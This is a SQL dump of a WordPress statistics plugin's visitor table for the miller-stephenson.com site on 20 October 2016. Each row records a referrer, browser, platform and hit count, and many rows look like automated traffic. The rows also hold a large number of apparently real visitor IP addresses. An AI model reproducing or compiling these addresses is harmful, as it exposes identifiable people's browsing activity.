INSERT INTO `wp_statistics_visitor` VALUES (7542, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '71.183.196.72', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7543, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '43.225.194.123', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7544, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '64.231.148.173', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7545, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.229.246.141', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7546, '2016-10-20', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwj_sar91enPAhVI2IMKHWGwBiMQFghKMAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-205%2F&usg=AFQjCNHwZ2VkQ2EkLZn-9yjL6I2BINcdgA&bvm=bv.136499718,d.amc', 'MSIE', 'Windows', '11.0', '', '70.61.245.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7547, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '50.196.78.9', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7548, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '87.205.94.29', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7549, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.180.244.208', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7550, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '123.231.109.237', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7551, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.80.166.95', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7552, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.66.100.143', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7553, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '47.0', '', '206.127.172.117', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7554, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.76.26.166', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7555, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '47.200.211.19', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7556, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '160.178.157.172', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7557, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.53.20.41', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7558, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.133.232.17', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7559, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.64.208.167', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7560, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.64.55.19', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7561, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.87.175.240', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7562, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.144.181.1', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7563, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.50.72.202', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7564, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '120.28.191.12', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7565, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '59.98.117.144', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7566, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.59', '', '81.136.168.168', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7567, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.26.93.85', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7568, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.200.162.168', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7569, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '62.107.151.34', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7570, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '195.158.82.140', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7571, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '43.255.222.70', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7572, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.113.162.234', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7573, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.207.133.199', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7574, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.106.23.10', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7575, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '201.19.36.137', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7576, '2016-10-20', 'https://www.google.com.sg/', 'Chrome', 'iPhone', '53.0.2785.109', '', '180.255.240.99', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7577, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.24.151.23', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7578, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.122.167.20', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7579, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '122.179.103.122', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7580, '2016-10-20', 'https://www.miller-stephenson.com/product/epon-1031/', 'Safari', 'iPhone', '7.0', '', '65.55.210.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7581, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.85.73.145', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7582, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '98.197.140.120', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7583, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.35.151.103', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7584, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '212.200.27.230', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7585, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.148.90.10', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7586, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.146.195.22', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7587, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '119.194.145.154', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7588, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.71.1.75', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7589, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.216.19.73', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7590, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.169.251.218', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7591, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '220.136.209.149', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7592, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '167.115.115.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7593, '2016-10-20', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '75.144.8.141', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7594, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '75.61.164.112', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7595, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '183.83.50.197', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7596, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '59.97.243.140', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7597, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '187.36.176.64', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7598, '2016-10-20', 'https://www.google.com.sg/', 'Safari', 'iPhone', '600.1.4', '', '116.12.240.168', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7599, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '218.54.91.42', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7600, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '157.204.1.3', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7601, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.148.74.75', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7602, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '115.99.92.125', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7603, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '51.0.2704.63', '', '199.67.131.151', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7604, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.164.251.155', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7605, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.24.167.216', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7606, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '193.231.40.44', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7607, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '212.48.241.219', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7608, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '81.201.48.29', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7609, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '175.157.162.144', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7610, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '180.252.164.140', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7611, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '92.52.41.35', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7612, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '85.219.132.11', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7613, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.118.93.124', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7614, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '58.68.20.218', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7615, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.183.180.116', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7616, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '202.142.107.103', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7617, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.248.152.164', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7618, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '85.122.30.12', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7619, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '59.95.223.191', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7620, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '125.62.199.214', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7621, '2016-10-20', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '72.54.186.105', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7622, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.62.109.146', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7623, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '37.210.202.117', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7624, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '36.84.13.53', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7625, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.81.213.147', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7626, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.101.86.201', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7627, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.242.12.202', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7628, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '36.74.113.159', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7629, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '184.70.181.126', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7630, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '116.75.180.94', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7631, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '91.231.122.122', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7632, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.96.228.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7633, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '75.44.83.169', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7634, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.196.191.104', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7635, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '104.221.80.96', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7636, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '27.48.2.30', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7637, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.52.140.167', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7638, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.103.39.173', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7639, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '59.184.29.182', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7640, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '37.182.164.168', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7641, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '85.254.77.121', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7642, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.28.39.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7643, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '183.96.24.70', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7644, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.120.34.209', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7645, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '171.49.216.237', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7646, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.104.119.63', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7647, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '137.101.83.224', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7648, '2016-10-20', 'https://www.miller-stephenson.com', 'Android Browser', 'Android', '4.0', '', '71.95.111.138', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7649, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '119.26.60.101', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7650, '2016-10-20', 'https://www.miller-stephenson.com/', 'Chrome', 'Macintosh', '39.0.2171.99', '', '184.175.251.234', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7651, '2016-10-20', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '184.175.251.234', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7652, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.41.225.118', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7653, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '88.238.97.135', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7654, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.11.162.35', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7655, '2016-10-20', 'https://www.miller-stephenson.com/', 'PHP', 'Unknown', '5.', '', '184.175.251.234', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7656, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.23.3.46', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7657, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '194.166.174.71', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7658, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '92.234.134.227', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7659, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '148.0.125.121', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7660, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.10.18.58', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7661, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '87.132.42.138', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7662, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '222.165.209.11', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7663, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.59.39.32', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7664, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.63.178.240', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7665, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '192.0.172.205', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7666, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '202.170.51.251', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7667, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '107.77.169.9', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7668, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '70.199.12.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7669, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.147.193.149', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7670, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.37.71.238', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7671, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.180.149.18', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7672, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '87.150.219.166', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7673, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '205.200.160.84', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7674, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.4', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7675, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.114.85.1', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7676, '2016-10-20', 'https://www.google.com/url?url=https://www.miller-stephenson.com/product/ms-907-two-part-epoxy-adhesive/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwjLhr_A3-nPAhUD64MKHa8LBc0QFggeMAI&usg=AFQjCNExLWmK-yw5RXCvfOTprZ0iidQ23A', 'MSIE', 'Windows', '8.0', '', '66.150.8.161', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7677, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '205.211.141.177', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7678, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.13.221.21', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7679, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '31.11.98.162', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7680, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.221.241.190', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7681, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.132.219.163', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7682, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.113.232.2', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7683, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '96.125.240.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7684, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '129.56.0.171', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7685, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.78.95.34', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7686, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '47.29.58.254', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7687, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.41.70.9', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7688, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.36.146.245', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7689, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '121.9.64.62', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7690, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '212.67.133.143', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7691, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '81.170.18.54', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7692, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.255.26.110', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7693, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '10.10.32.187', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7694, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '175.139.129.114', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7695, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.185.123.48', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7696, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '222.2.106.176', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7697, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '123.231.107.76', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7698, '2016-10-20', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '64.20.203.34', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7699, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.252.165.99', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7700, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.171.87.41', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7701, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '200.239.65.168', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7702, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.124.100.250', '000', 4, 0); 
